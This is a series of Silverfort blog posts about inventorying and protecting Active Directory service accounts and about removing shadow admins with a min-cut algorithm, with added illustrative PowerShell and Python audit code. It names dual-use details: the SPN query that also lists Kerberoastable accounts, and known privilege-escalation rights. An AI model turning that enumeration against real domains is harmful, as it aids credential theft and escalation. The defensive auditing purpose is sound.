Because Silverfort can detect all machine-like behavioral patterns, it can also flag whether an account is also being used by a human user and alert on this bad practice. Silverfort detects the erratic patterns associated with human user activity that do not correlate with the machine’s behavior patterns and alerts on the irregular activity of the service account. 2. Monitoring & Risk Analysis The next and continuous phase is monitoring all service account activity and associated risks. Now that there is a complete picture with full visibility into all service account details and behavior, Silverfort constantly monitors and audits their use. Silverfort’s Investigation screen shows various insights into a specific service account's activity. Silverfort can identify different configurations and behaviors of service accounts, such as high-level permissions, broad use, repetitive behavior, etc. Silverfort then adds a risk analysis and a level of predictability to each service account to enable administrators to better understand the degree to which specific service accounts are at risk. By continuously monitoring all authentication and access activity, Silverfort can assess the risk of every authentication attempt and thus immediately detect any suspicious behaviors or anomalies, providing SOC teams with actionable insights into overall service account activity. The importance of monitoring and auditing Active monitoring and auditing are crucial components of service account management. By keeping a close eye on the activities of these accounts, organizations can swiftly detect any suspicious behavior and take necessary action to prevent potential breaches. Active Monitoring and Anomaly Detection Active monitoring involves continuously tracking and analyzing the activities of service accounts to identify any deviations from normal behavior patterns.
This could be an unusually high number of failed login attempts, modifications to account privileges, or changes in login locations or times. By setting up automated alert systems, organizations can be notified of such anomalies in real time, enabling them to respond promptly to potential threats. Auditing and Authentication Monitoring The purpose of auditing is to ensure compliance with organizational policies and regulatory requirements by conducting periodic reviews of service account activities. Authentication monitoring, on the other hand, focuses on verifying the identities of the users attempting to access service accounts. Both these measures help in maintaining accountability and enhancing the overall security of service accounts. Visibility and Auditing Challenges Managing service accounts comes with numerous visibility and auditing challenges. Without proper tools and processes in place, it can be difficult to keep track of all service accounts within an organization, especially in large-scale environments with hundreds or even thousands of accounts. Dormant and Forgotten Service Accounts One common issue is the existence of dormant or forgotten service accounts. These are accounts that have been created for a particular purpose but are no longer in use, either because the project they were associated with has ended, or the employee who created them has left the organization. These dormant accounts can pose a serious security risk as they could be exploited by malicious actors to gain unauthorized access to the system. Therefore, it's important to regularly audit service accounts and deactivate any that are no longer needed. Sharing of Service Account Credentials While sharing one account's credentials across several services may seem convenient, it significantly increases the risk of a security breach. If the credentials are compromised, all services using those credentials become vulnerable.
To mitigate this risk, each service should have its own dedicated service account with unique credentials. 3. Analyze & Access Policies Once full visibility and insight into all service accounts are achieved, the next phase is to analyze these insights and create access policies that act as a digital fence around these non-human accounts. Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications). Silverfort enables admins to analyze their service accounts' insights to identify specific service account behaviors. Silverfort shows the number of hits per source and destination, which helps admins prioritize the sources and destinations their service accounts connect to, ensuring they are properly monitored and protected. After analyzing the service accounts, Silverfort automatically recommends tailored policies for each service account. Each recommended policy is formulated to lower risk without blocking traffic: it starts in monitor mode, tracking policy violations so that the admin can confirm the policy is complete (every legitimate source, destination and protocol is covered) before switching to enforcement, without impacting the traffic. Silverfort has three types of authentication policies for service accounts:
• Block access
• Alert to SIEM
• Alert
For each policy created with Silverfort, administrators can choose sources, destinations, authentication protocols, when policies should be applied, and what actions the system should take in case of a deviation. In the case of an organization with a large number of service accounts, Silverfort allows admins to create general policies that can be assigned to multiple service accounts. This can be done by using Silverfort’s recommended policies.
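The discovery classification from step 1 (M2M, hybrid, scanner, and human use of a machine account) and the source/destination fence with monitor-versus-block policies from step 3, worked through as an added PowerShell example. This is not Silverfort's code or its actual algorithm; it is an illustration of the technique on constructed authentication records shaped like Windows Security event 4624 fields (account, source host, destination host, logon type). The account names, hosts, the scanner threshold and the choice of logon types that count as interactive are assumptions made for the example.

```powershell
# Added example, not Silverfort's code: behavioural triage of service accounts from
# authentication records, then a "fence" policy replayed in monitor mode and in block mode.
# The records below are constructed sample data shaped like Security event 4624 fields.
# To feed real events: Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} and map
# Properties[5]=TargetUserName, [8]=LogonType, [11]=WorkstationName, [18]=IpAddress, with the
# event's MachineName as the destination. Thresholds and names here are illustrative assumptions.

$interactiveLogonTypes = 2, 7, 10, 11   # Interactive, Unlock, RemoteInteractive, CachedInteractive

$trainingEvents = @(
    # svc-backup: one source, one destination, network logons only -> M2M
    [pscustomobject]@{ Account = 'svc-backup'; Source = 'BKP01'; Destination = 'FS01'; LogonType = 3 }
    [pscustomobject]@{ Account = 'svc-backup'; Source = 'BKP01'; Destination = 'FS01'; LogonType = 3 }
    # svc-scan: one source fanning out to many destinations -> scanner
    1..8 | ForEach-Object { [pscustomobject]@{ Account = 'svc-scan'; Source = 'VS01'; Destination = ('SRV{0:d2}' -f $_); LogonType = 3 } }
    # svc-sql: normal network logons plus an RDP session (type 10) from a workstation -> hybrid
    [pscustomobject]@{ Account = 'svc-sql'; Source = 'APP01';   Destination = 'SQL01'; LogonType = 3 }
    [pscustomobject]@{ Account = 'svc-sql'; Source = 'WS-DAVE'; Destination = 'SQL01'; LogonType = 10 }
)

# Profile each account: classification plus the learned source>destination pairs.
# Only non-interactive logons contribute to the fence, so a human session is never "learned".
function Get-ServiceAccountProfile {
    param([object[]]$Events, [int]$ScannerThreshold = 5)
    $Events | Group-Object Account | ForEach-Object {
        $group        = $_.Group
        $machineUse   = @($group | Where-Object { $interactiveLogonTypes -notcontains $_.LogonType })
        $humanUse     = @($group | Where-Object { $interactiveLogonTypes -contains $_.LogonType })
        $sources      = @($machineUse | ForEach-Object { $_.Source } | Sort-Object -Unique)
        $destinations = @($machineUse | ForEach-Object { $_.Destination } | Sort-Object -Unique)
        $class = if ($humanUse.Count -gt 0) { 'Hybrid' }
                 elseif ($destinations.Count -ge $ScannerThreshold -and $sources.Count -le 2) { 'Scanner' }
                 else { 'M2M' }
        [pscustomobject]@{
            Account         = $_.Name
            Class           = $class
            Sources         = $sources.Count
            Destinations    = $destinations.Count
            InteractiveFrom = (@($humanUse | ForEach-Object { $_.Source } | Sort-Object -Unique) -join ',')
            AllowedPairs    = @($machineUse | ForEach-Object { "$($_.Source)>$($_.Destination)" } | Sort-Object -Unique)
        }
    }
}

# Replay events against a per-account policy. Without -Enforce every policy behaves as "Alert",
# which is how a new policy should run until its allowed pairs are known to be complete.
function Test-ServiceAccountFence {
    param([object[]]$Events, [hashtable]$Policy, [switch]$Enforce)
    foreach ($e in $Events) {
        $rule = $Policy[$e.Account]
        if (-not $rule) { continue }                                            # account has no policy yet
        $pair        = "$($e.Source)>$($e.Destination)"
        $interactive = $interactiveLogonTypes -contains $e.LogonType
        if (-not $interactive -and $rule.Allowed -contains $pair) { continue }  # inside the fence
        $reason = if ($interactive) { 'interactive logon by a service account' } else { 'source/destination outside learned fence' }
        $action = if ($Enforce) { $rule.Action } else { 'Alert' }
        [pscustomobject]@{
            Account = $e.Account; Source = $e.Source; Destination = $e.Destination; LogonType = $e.LogonType
            Reason  = $reason
            Action  = $action
        }
    }
}

$profiles = Get-ServiceAccountProfile -Events $trainingEvents
$profiles | Format-Table Account, Class, Sources, Destinations, InteractiveFrom -AutoSize

# Build a Block policy for each account from its learned pairs.
$policy = @{}
foreach ($p in $profiles) { $policy[$p.Account] = @{ Allowed = $p.AllowedPairs; Action = 'Block' } }

$newEvents = @(
    [pscustomobject]@{ Account = 'svc-backup'; Source = 'BKP01';   Destination = 'FS01';  LogonType = 3 }   # normal
    [pscustomobject]@{ Account = 'svc-backup'; Source = 'WS-DAVE'; Destination = 'DC01';  LogonType = 3 }   # lateral movement attempt
    [pscustomobject]@{ Account = 'svc-sql';    Source = 'WS-DAVE'; Destination = 'SQL01'; LogonType = 10 }  # human using the account
)
Test-ServiceAccountFence -Events $newEvents -Policy $policy          | Format-Table -AutoSize   # monitor mode: Action = Alert
Test-ServiceAccountFence -Events $newEvents -Policy $policy -Enforce | Format-Table -AutoSize   # enforced:     Action = Block
```

The two replays at the end are the point of the monitor-then-enforce sequence: the same two deviations (svc-backup reaching a domain controller from a workstation, and a person opening an RDP session as svc-sql) are reported with Action = Alert while the policy is being validated, and with Action = Block once -Enforce is set, while the legitimate BKP01>FS01 authentication is silent in both modes.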
Once policies have been created for all service accounts with Silverfort, admins can simply enable and automatically enforce these policies without the need to make any changes to applications, change passwords, or make use of any proxies. With complete visibility into these accounts and the ability to proactively protect service accounts with access policies, organizations will now be well-equipped to reduce their attack surface from compromised service accounts. Learn More About Silverfort's Service Account Protection The alarming reality of service account compromises cannot be ignored, as they continue to occur regularly and have been instrumental in major, high-profile cyberattacks. These incidents serve as stark reminders of the critical importance of securing service accounts and implementing robust protective measures. Service accounts have emerged as a preferred target for malicious actors due to their elevated privileges and widespread access within organizations. These accounts often hold the keys to the kingdom, granting malicious actors entry to sensitive data, critical systems, and confidential resources. To address this, organizations must prioritize the implementation of service account security best practices such as strong authentication, regular monitoring, and strict access policies. By prioritizing service account security, organizations can mitigate the risk of compromised service accounts being used by malicious actors in cyber attacks. Interested in seeing how Silverfort can help you to discover, monitor, and protect service accounts? Request a demo here. --- - Published: 2023-08-08 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/list-all-service-accounts-in-domain/ Maintaining control and visibility over service accounts is crucial for any organization's identity security posture management.
These privileged accounts are often created to automate system functions and then forgotten, creating security holes that can be exploited. Not knowing the full scope of the service accounts and their activity on your network and servers leaves gaps that cybercriminals actively target. This article provides a step-by-step guide for cybersecurity professionals to gain a complete inventory of service accounts across their Active Directory domain and Windows servers. The lack of documentation of service accounts presents a major weakness, and this process helps close that gap by creating a full accounting of accounts with privileged access. Properly managing and monitoring service accounts is a key way to strengthen defenses and avoid becoming the next headline. How to Generate a List of All Service Accounts in Your Domain To get a complete inventory of service accounts in your domain, you need to query your domain controllers. Service accounts are used by Windows services, IIS application pools, SQL Server, and other applications to access resources. However, without proper documentation and oversight, orphaned service accounts can pose a security risk. Generate a list of the domain user accounts that have a Service Principal Name (SPN) registered by running the following PowerShell command (it needs the ActiveDirectory module, so run it on a domain controller or on a workstation with RSAT installed):

```powershell
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties SamAccountName,ServicePrincipalName | Select-Object SamAccountName,ServicePrincipalName | Export-CSV C:\Temp\ServiceAccounts.csv
```

This will:
- Use the Get-ADUser cmdlet to retrieve Active Directory user accounts
- Filter the results to only return users that have a ServicePrincipalName attribute set (a user account with an SPN is a Kerberos service identity, the most reliable single indicator that it is a service account, and also exactly the set of accounts exposed to Kerberoasting)
- Export the SamAccountName and ServicePrincipalName properties to a CSV file called ServiceAccounts.csv
The SPN query is a starting point rather than a complete inventory: a service account that only ever authenticates with NTLM or a plain password has no SPN, and group Managed Service Accounts (gMSAs) are a separate object class returned by Get-ADServiceAccount, not by Get-ADUser. Supplement it with accounts whose password is set to never expire, accounts that follow your naming convention (for example "svc-*"), and the service configuration on the servers themselves (the StartName of each Win32_Service, IIS application pool identities, and the SQL Server service accounts). Open the CSV file to view the list of service accounts.
The SamAccountName is the account name, and ServicePrincipalName lists the service class and host the account is registered to serve (for example, MSSQLSvc/<host>:1433 for a SQL Server instance). Then:

- Review each service account to determine whether it is still in use. Check with application owners to verify the account is still required.
- Disable or delete any unused service accounts to reduce the risk of compromise.
- Document all active service accounts, including details about the owning application or service.
- Establish a process to review service accounts regularly so the documentation stays up to date.

Taking the time to find all service accounts in your domain and implement oversight procedures is an important part of an overall security strategy. Undocumented and abandoned service accounts provide easy access that malicious actors can exploit. Maintaining an accurate register of all service accounts allows you to manage and monitor them properly.

### Verifying Service Accounts and Their Permissions

Once service accounts have been identified, verify that their permissions are properly scoped. Overly permissive service accounts are a major security risk, as malicious actors can leverage them to gain broad access within the network.

#### Reviewing Service Account Permissions

The first step is to determine what level of access each account has been granted. This includes:

- Reviewing group memberships. Service accounts should belong only to groups directly relevant to their function. Accounts in highly privileged groups such as Domain Admins should be scrutinized.
- Analyzing NTFS file and folder permissions. Service accounts should have permissions only on the files and folders essential to their intended use. Full Control or Modify on sensitive directories is a red flag.
- Checking for privileged account types.
Accounts with administrative privileges such as Enterprise Admins or Schema Admins require close review; these highly privileged accounts are frequent targets of compromise.
- Reviewing user rights assignments and delegation. The "Act as part of the operating system" (SeTcbPrivilege) and "Impersonate a client after authentication" (SeImpersonatePrivilege) rights, assigned through Group Policy or the local security policy, are well-known local privilege escalation primitives. Grant them to a service account only where the application demonstrably needs them, and review any Kerberos delegation configured on the account with the same scrutiny.
- Analyzing SQL Server, SharePoint, and other application permissions. Service accounts with db_owner or farm administrator roles have broad access and should be closely reviewed.

Only the minimum permissions required for the account's function should be granted. For any overly permissive service account, reduce permissions to the level the account actually needs to operate. If the business justification for an account's broad access is unclear, it may be an unauthorized or "shadow" account that should be disabled. Rigorously verifying and reducing service account permissions limits the potential impact of account compromise. By following least-privilege scoping for service accounts, organizations can significantly reduce the risks related to service account access.

### Ongoing Monitoring and Management of Service Accounts

Regular monitoring and management of service accounts are crucial for maintaining security and compliance. Once the initial audit is complete, ongoing review processes must be implemented so that no accounts are overlooked or misused.

#### Scheduled Reviews

Review service accounts at least quarterly. During reviews, check that account passwords are complex and unique, that unused accounts are disabled or deleted, and that permissions and access rights are appropriate and necessary for the account's function. Because service accounts authenticate non-interactively, a conventional MFA prompt is rarely something they can complete; the equivalent control is to restrict each account to the source and destination machines it is known to use and to alert on, or block, any authentication outside that pattern.
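The review checks above (privileged group membership, unused accounts, and disabled accounts that still carry privileged rights), applied to a CSV export like the one the Get-ADUser command produces, as an added Python example. This is not code from the original post; the export rows, the group names, and the review date are constructed for illustration, and the example assumes the export was extended with the MemberOf, LastLogonDate and Enabled properties with MemberOf flattened to semicolon-separated group names.

```python
import csv
import io
from datetime import date, datetime

# Constructed export (not real directory data). Assumes the Get-ADUser query was extended with
# -Properties MemberOf,LastLogonDate,Enabled and that MemberOf was flattened to ';'-separated names.
EXPORT_CSV = """\
SamAccountName,ServicePrincipalName,MemberOf,LastLogonDate,Enabled
svc_sql,MSSQLSvc/sql01.corp.example:1433,SQL Admins;Domain Admins,2023-07-30,True
svc_backup,backup/bkp01.corp.example,Backup Admins,2023-08-01,True
svc_legacy,http/legacyapp.corp.example,,2022-11-14,True
svc_sharepoint,http/sp01.corp.example,Enterprise Admins,2023-07-29,False
"""

# Built-in AD groups whose membership amounts to domain-level administrative control.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}

# Date the constructed export was taken (an assumption of this example).
REVIEW_DATE = date(2023, 8, 8)


def parse_export(csv_text):
    """Parse the CSV export into dicts with typed fields."""
    accounts = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        accounts.append({
            "name": row["SamAccountName"],
            "spns": [s for s in row["ServicePrincipalName"].split(";") if s],
            "groups": {g for g in row["MemberOf"].split(";") if g},
            "last_logon": (datetime.strptime(row["LastLogonDate"], "%Y-%m-%d").date()
                           if row["LastLogonDate"] else None),
            "enabled": row["Enabled"].lower() == "true",
        })
    return accounts


def review(accounts, today=REVIEW_DATE, stale_days=90):
    """Apply the review checks from the text. Returns one finding per issue found."""
    findings = []
    for acct in accounts:
        privileged = acct["groups"] & PRIVILEGED_GROUPS
        for group in sorted(privileged):
            findings.append({"account": acct["name"], "check": "privileged-group",
                             "detail": f"member of {group}; confirm the service really needs it"})
        if acct["enabled"]:
            # An enabled account that has not authenticated in a long time is a disable candidate.
            if acct["last_logon"] is None or (today - acct["last_logon"]).days > stale_days:
                findings.append({"account": acct["name"], "check": "stale",
                                 "detail": f"no logon in the last {stale_days} days; candidate to disable"})
        elif privileged:
            # Disabling is not enough: a re-enabled (or password-reset) account gets the rights back.
            findings.append({"account": acct["name"], "check": "disabled-but-privileged",
                             "detail": "disabled account still holds privileged membership; remove it"})
    return findings


if __name__ == "__main__":
    for f in review(parse_export(EXPORT_CSV)):
        print(f"{f['account']:15} {f['check']:24} {f['detail']}")
```

On the constructed export this reports svc_sql for its Domain Admins membership, svc_legacy as unused, and svc_sharepoint twice: once for Enterprise Admins and once because the account is disabled but still privileged. The thresholds and group list are inputs to adjust, not recommendations.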
#### Monitoring Account Usage

Continuously monitor service account activity and logon events. Watch for anomalies such as logons from unknown devices or locations, logons during unusual hours, or newly elevated permissions. Watch also for signs that a service account may have been compromised, such as installation of unknown software or configuration changes. Configure alerts and reports to notify administrators of questionable account activity that requires review.

#### Documentation

Well-documented service accounts are easier to manage and audit. Documentation should include the account's purpose, owner, permissions, and the devices and software it accesses. Documentation makes it simpler to determine whether an account change was legitimate and authorized. A lack of documentation hampers thorough review of service accounts and increases security risk.

#### Account Ownership

Ensure that every service account has a designated owner, even for automated processes. Owners should review access and usage regularly to verify that the account is still required and is being used properly. Unowned or orphaned accounts are more prone to abuse or neglect, since no one claims responsibility for managing them.

With routine attention and oversight, service accounts can be kept secure and compliant. Without ongoing monitoring and management, the hard work of the initial audit will quickly be undone as security holes develop and access rights spiral out of control. Establishing a regular schedule to review accounts, monitor activity, update documentation, and verify ownership is key.

### The Importance of Knowing All Your Service Accounts

Service accounts are accounts used by Windows services, IIS application pools, and scheduled tasks to access resources. Because they often have elevated privileges, they are a common attack vector for external attackers and malicious insiders.
Not knowing all the service accounts in your domain and which resources they access leaves your organization vulnerable to unauthorized access and data breaches. Regular service account audits are a proactive security measure, required to maintain compliance with regulations such as PCI DSS and to minimize your attack surface.

- Service accounts provide a way into your network. Attackers frequently target service accounts with weak passwords or excessive privileges to gain initial access. Once inside, they use the account to reach data and move laterally.
- Orphaned service accounts are vulnerable. Service accounts no longer associated with a service or task but still active in AD are attractive targets. It is critical to identify and disable them.
- Privilege creep happens over time. Service accounts may accumulate additional access rights as new services and systems come online, ending up with more privileges than they need. Audits prevent privilege creep by ensuring accounts keep least-privilege access.
- Compliance is at risk. Regulations such as PCI DSS require strict control and monitoring of administrative accounts, service accounts included. Failing to audit service accounts regularly puts compliance at risk and can result in penalties.

### The Risks of Not Having a Full Service Account Inventory

An incomplete inventory of service accounts in your Active Directory environment poses serious risks. Unauthorized access to service accounts can result in privilege escalation, allowing malicious actors to gain administrative rights and reach sensitive information; data breaches, service interruptions, and compliance failures follow. Service accounts are often overlooked in audits and security reviews because they are non-human accounts, yet they frequently hold the elevated privileges required to run applications and services.
If these accounts are compromised, adversaries find it easier to move laterally within the network and gain administrative access. When service accounts with broad access are compromised, data breaches become more likely: once an attacker has access to a system, sensitive information such as customer data, intellectual property, and financial records can be accessed and exfiltrated. Regulatory compliance is also at risk if auditors discover unknown service accounts with excessive privileges. When service accounts are misused to tamper with applications, servers, and network devices, outages and disruptions follow, and malware or ransomware deployed through a compromised service account can cripple systems and halt business operations.

A comprehensive inventory of service accounts lets organizations implement appropriate controls, reducing the risk of unauthorized access, privilege escalation, data breaches, and service disruptions. Continuous monitoring and review of service accounts should be part of any Active Directory security program; without it, these accounts remain easy targets for malicious actors.

### How Silverfort Finds and Protects All Service Accounts

Silverfort understands the importance of knowing and managing all service accounts. Our solution builds a complete inventory and proactively identifies and protects service accounts, mitigating the risks of unauthorized access and privilege escalation. We go beyond periodic audits to address non-human accounts continuously, managing the elevated privileges service accounts require. Continuous monitoring and control let us detect and respond to threats swiftly, reducing data breaches, disruptions, and compliance issues.
Silverfort not only prevents unauthorized access but also blocks lateral movement, so malicious actors cannot gain administrative access. We understand the high stakes of security and compliance, so our solution eliminates easy targets while strengthening your Active Directory security program and keeping you ahead of threats.

---

- Published: 2023-08-03
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/resolving-shadow-admins-achieving-maximum-impact-with-minimal-effort/

Shadow admins are non-administrative users that hold sensitive privileges which effectively grant them admin-level rights. Such privileges can include direct access to resources or the ability to modify other users' settings (for example, resetting passwords or holding "Write All Properties" permissions). In this blog post, we focus on the second type. Shadow admin accounts are created for several reasons: human error, mismanagement, a temporary need, or an attacker who has gained access and wants to hide their presence. Shadow admins are a known risk for almost every Identity Provider (IdP), including Microsoft Active Directory (AD), Microsoft Entra ID (formerly Azure AD), and Okta, among others. Here, we discuss shadow admins within AD.

Identity teams continuously search for shadow admin accounts in order to revoke their excessive privileges, but this process is often lengthy and tedious, especially in an organization with a large number of shadow admins. My team and I were curious about the common permission configurations that cause a user to become a shadow admin, as well as the best ways to identify and mitigate them. In this blog post, we use algorithmic tools and graph theory to present a method for revealing shadow admins within an organization, analyzing them, and resolving them.

### Understanding the Threat of Shadow Admins

A user account becomes a shadow admin if it has strong privileges over an existing admin account.
Likewise, any account with strong privileges over the shadow admin's account also becomes a shadow admin. For example, if Alice had a regular (non-admin) account holding a strong permission over an admin account, she would be a shadow admin; if Bob gained strong permissions over Alice's account, he would become a shadow admin too. These chains of permissions complicate matters, and in practice many shadow admins have more than one path to admin rights. What makes shadow admin accounts both challenging and risky is that they are not monitored or supervised, so their activity can go undetected.

Interested in learning more about shadow admins and how they threaten your organization? Read this blog post: https://www.silverfort.com/blog/the-hidden-dangers-of-shadow-admins/

To resolve the risk of shadow admins we need to revoke some of their excessive permissions, which takes time and effort. Any organization with many shadow admins would therefore want to resolve the maximum number of shadow admins with the least amount of effort (i.e., the fewest permission changes). To do this efficiently, we retrieve the permissions that users and groups hold from a selected set of modification permissions (password reset, Write All Properties, and similar) and monitor them. From this data we construct chains of permissions and obtain details on the shadow admins in the organization.

### Translating the Issue

In any organization with shadow admins, multiple permission chains connect users to the administrative accounts they could potentially take over. The goal is to make as few permission changes as possible while resolving a large portion of the organization's shadow admins. The question, therefore, is which permissions those are. Rephrased: identify the optimal set of K permissions that, if revoked, would mitigate the maximum number of shadow admins.
With this definition in hand, we can turn the problem into a visual one using graph theory: every account or group becomes a node, and every permission becomes a directed edge between nodes. All permission chains can then be displayed and connected on a single graph, together with their privileges and attributes. Using the information in the permission chains, we identify the organization's admins and administrative groups and mark them in the graph, since they are the end goal of a shadow admin. At this stage, such a graph looks like this:

Note: edges are permissions between entities, directed from the holder of the permission to the entity it is held over. Red nodes are admins and administrative groups; brown nodes are user groups; gray nodes are individual users.

Next, we rewrite the problem statement once more: find the set of K edges whose removal disconnects as many shadow admins as possible from the rest of the graph (i.e., mitigates them).

### Breaking Apart the Approach

At first glance we see a Directed Acyclic Graph (DAG) connecting our various permission chains (real permission graphs can contain cycles, for example two accounts that each hold a reset right over the other; the flow construction below handles those as well). Consider how each entity can hold permission over another: in a sense, a shadow admin "moves" through the graph from node to node along its edges, and more than one shadow admin may be capable of the same movement. Now imagine all shadow admins in the organization moving towards the red nodes (the admins); along each path a certain number of shadow admins are "flowing" towards their goal. Note that it does not matter whether several shadow admins flow towards a single node on their path, or whether that node is a single account: once they reach that point, only a single account continues along the path.
This is reminiscent of the classic maximum flow problem from network optimization, usually pictured as liquid running through pipes from a few source nodes to a few destination nodes. So let us turn to the max-flow min-cut theorem: the maximum amount of flow that can pass from the source to the sink equals the total capacity of a minimum cut. We define the following:

- Flow capacity of an edge: every edge has an upper limit on the flow passing through it.
- Conservation of flow: at every node other than the source and the sink, incoming flow equals outgoing flow.
- Cut: a partition of the nodes into two sets with the source on one side and the sink on the other; the capacity of the cut is the sum of the capacities of the edges crossing from the source side to the sink side.

A max-flow algorithm (Ford–Fulkerson, or Edmonds–Karp with breadth-first search) repeatedly augments the flow along paths from source to sink until no augmenting path remains. At that point the set of nodes still reachable from the source in the residual graph defines a minimum cut, and the saturated edges crossing it are the cut edges. Solving the flow problem therefore hands us a minimum cut, which is exactly the set of K edges we want to remove: by the theorem, the largest flow the system can carry equals the capacity of the cheapest set of edges separating source from sink. If every permission edge is given capacity 1 and the dummy edges attached to the source and sink are given unbounded capacity (so they are never chosen), the cut capacity is simply the number of permissions to revoke.

The graph the algorithm runs on looks something like this:

Green node is the dummy source and green edges are its connections to admins/administrative groups. Blue node is the dummy sink and blue edges are its connections to leaf nodes.

### Results and Conclusions

Applying our method to more than 30 organizations, we found a median of around 30 active accounts per organization identified as shadow admins, with a few organizations having as many as 1,000 such accounts.
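The construction described above, carried out end to end as an added Python example (this is not the author's implementation, and the accounts, groups and permissions are constructed for illustration). It builds the permission graph with edges from holder to target, attaches a dummy source to every shadow-admin candidate and a dummy sink to every admin node (the mirror image of the figure's orientation, which yields the same cut), gives permission edges capacity 1 and dummy edges unbounded capacity, runs Edmonds–Karp, and reads the minimum cut off the residual graph. The sample deliberately gives one user two routes to admin rights, the pattern the post says simpler approaches miss.

```python
from collections import defaultdict, deque

INF = float("inf")
SOURCE, SINK = "__source__", "__sink__"

# Constructed permission data (hypothetical names, not from any real directory).
# (holder, target, permission): the holder has `permission` over the target, so the edge
# runs holder -> target, matching the "direction is who they hold permission over" convention.
PERMISSIONS = [
    ("Helpdesk",   "adm_alice",    "ResetPassword"),
    ("bob",        "Helpdesk",     "WriteMembers"),
    ("carol",      "Helpdesk",     "WriteMembers"),
    ("dave",       "Helpdesk",     "WriteMembers"),
    ("dave",       "adm_alice",    "GenericAll"),     # dave has two routes to admin rights
    ("erin",       "svc_deploy",   "WriteDacl"),
    ("frank",      "svc_deploy",   "ResetPassword"),
    ("svc_deploy", "DomainAdmins", "WriteMembers"),
]
ADMINS = {"adm_alice", "DomainAdmins"}   # red nodes
GROUPS = {"Helpdesk", "DomainAdmins"}    # groups are nodes in the graph but are not counted as shadow admins


def shadow_admins(permissions, admins=ADMINS, groups=GROUPS):
    """Non-admin accounts from which a chain of permissions reaches an admin node."""
    succ = defaultdict(set)
    for holder, target, _ in permissions:
        succ[holder].add(target)
    found = set()
    for start in list(succ):
        if start in admins or start in groups:
            continue
        stack, seen = [start], {start}
        while stack:
            node = stack.pop()
            if node in admins:
                found.add(start)
                break
            for nxt in succ[node] - seen:
                seen.add(nxt)
                stack.append(nxt)
    return found


def min_cut(permissions, admins=ADMINS, groups=GROUPS):
    """Edmonds-Karp max flow, then the source-side reachable set of the residual graph.
    Permission edges get capacity 1 (one revocation each); dummy edges get infinite capacity
    so the cut never 'removes' a dummy edge. Returns (max_flow, permissions_to_revoke)."""
    cap = defaultdict(lambda: defaultdict(int))

    def add_edge(u, v, c):
        cap[u][v] += c
        cap[v][u] += 0          # make sure the reverse residual edge exists

    for holder, target, _ in permissions:
        add_edge(holder, target, 1)
    for c in shadow_admins(permissions, admins, groups):
        add_edge(SOURCE, c, INF)    # source feeds every shadow-admin candidate ...
    for a in admins:
        add_edge(a, SINK, INF)      # ... and every admin node drains into the sink

    flow = 0
    while True:                     # BFS for the shortest augmenting path
        parent = {SOURCE: None}
        queue = deque([SOURCE])
        while queue and SINK not in parent:
            u = queue.popleft()
            for v, c in cap[u].items():
                if c > 0 and v not in parent:
                    parent[v] = u
                    queue.append(v)
        if SINK not in parent:
            break
        bottleneck, v = INF, SINK
        while parent[v] is not None:
            bottleneck = min(bottleneck, cap[parent[v]][v])
            v = parent[v]
        v = SINK
        while parent[v] is not None:
            u = parent[v]
            cap[u][v] -= bottleneck
            cap[v][u] += bottleneck
            v = u
        flow += bottleneck

    reachable, queue = {SOURCE}, deque([SOURCE])
    while queue:                    # source side of the minimum cut
        u = queue.popleft()
        for v, c in cap[u].items():
            if c > 0 and v not in reachable:
                reachable.add(v)
                queue.append(v)
    cut = [p for p in permissions if p[0] in reachable and p[1] not in reachable]
    return flow, cut


def resolve(permissions, admins=ADMINS, groups=GROUPS):
    """Revoke the cut and report which shadow admins that resolved."""
    before = shadow_admins(permissions, admins, groups)
    _, cut = min_cut(permissions, admins, groups)
    remaining = shadow_admins([p for p in permissions if p not in cut], admins, groups)
    return cut, before - remaining


if __name__ == "__main__":
    cut, resolved = resolve(PERMISSIONS)
    print(f"{len(shadow_admins(PERMISSIONS))} shadow admins; revoke {len(cut)} permissions to resolve {len(resolved)}:")
    for holder, target, perm in cut:
        print(f"  {holder} --{perm}--> {target}")
```

On this sample the six shadow admins (bob, carol, dave, erin, frank, svc_deploy) are all resolved by revoking three permissions: the helpdesk group's reset right over adm_alice, dave's direct GenericAll over adm_alice, and svc_deploy's WriteMembers over DomainAdmins. Revoking any of the edges further from the admins would have cost more changes for the same result, which is the effect the min cut captures.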
Applying the algorithm yields a minimum cut: a set of edges that, if removed, mitigates most shadow admins with minimal changes to the organization's permissions. The results look like this:

Yellow nodes are the shadow admins resolved by the recommended cut; revoking the permissions represented by the red edges negates all yellow shadow admins.

On average, a single iteration of the algorithm resolved around 70% of an organization's shadow admins, and all it took was revoking three permissions on average. This means we can provide the exact set of edges (i.e., permissions) the organization should consider revoking to obtain the best mitigation of shadow admins with minimal effort.

### Closing Thoughts

Shadow admins are a serious, often overlooked threat that traditional methods do not mitigate easily. A chain of privileges that leads to a domain admin is not always well documented, and one of the common patterns we noticed is that, in reality, a user usually has multiple ways to become a shadow admin. A different approach we tried was much simpler to implement, but it could not handle such patterns and returned sub-optimal results. Our solution monitors the permissions granted in an IdP environment and can dynamically build the best set of privileges to revoke in order to reduce the number of shadow admins with minimal action. A method like this pinpoints the optimal set of permissions to resolve with minimal effort, taking a real problem from the cybersecurity domain, visualizing it, and applying a known algorithm to reach a solution.

---

- Published: 2023-07-25
- Modified: 2025-04-14
- URL: https://www.silverfort.com/blog/cyber-insurance-can-actually-stop-ransomware-attacks/

Qualifying for a cyber insurance policy is just one more checkbox that security teams are required to tick. We've heard this statement over and over.
For most organizations, this is the main reason to purchase cyber insurance. That mindset is not entirely without grounds, but it turns out that implementing the identity protection controls insurers now require significantly increases resilience to ransomware attacks, to the point of blocking lateral movement attempts altogether. In this blog post, we recap how Optix, a market leader in optics IT software, implemented Silverfort's service account protection for the sole purpose of meeting its insurer's requirements, and how that protection then enabled it to block and fully mitigate a lateral movement attack.

### Why Do Insurers Care So Much About Service Accounts' Visibility and Protection?

